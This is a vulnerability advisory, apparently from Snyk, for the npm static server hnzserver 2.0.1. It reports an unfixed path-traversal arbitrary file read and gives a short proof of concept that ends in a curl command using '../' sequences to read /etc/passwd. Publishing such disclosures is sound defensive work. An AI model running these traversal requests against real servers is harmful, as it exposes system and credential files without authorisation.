hnzserver@2.0.1 vulnerabilities

一个静态的资源服务器

Direct Vulnerabilities

Known vulnerabilities in the hnzserver package. This does not include vulnerabilities belonging to this package’s dependencies.

How to fix?

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

Fix for free
VulnerabilityVulnerable Version
  • H
Arbitrary File Read

hnzserver is a static server.

Affected versions of this package are vulnerable to Arbitrary File Read. Path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files.

PoC by lightangel1412

  • Install the module

npm install -g hnzserver

  • Run 'hnzserver in "~/Desktop" directory :
root@kali:~/Desktop# hnzserver
server running is :http://localhost:8888
  • Use cURL to access etc/passwd file:

$ curl --path-as-is --url 'http://127.0.0.1:8888/../../../../etc/passwd'

How to fix Arbitrary File Read?

There is no fixed version for hnzserver.

*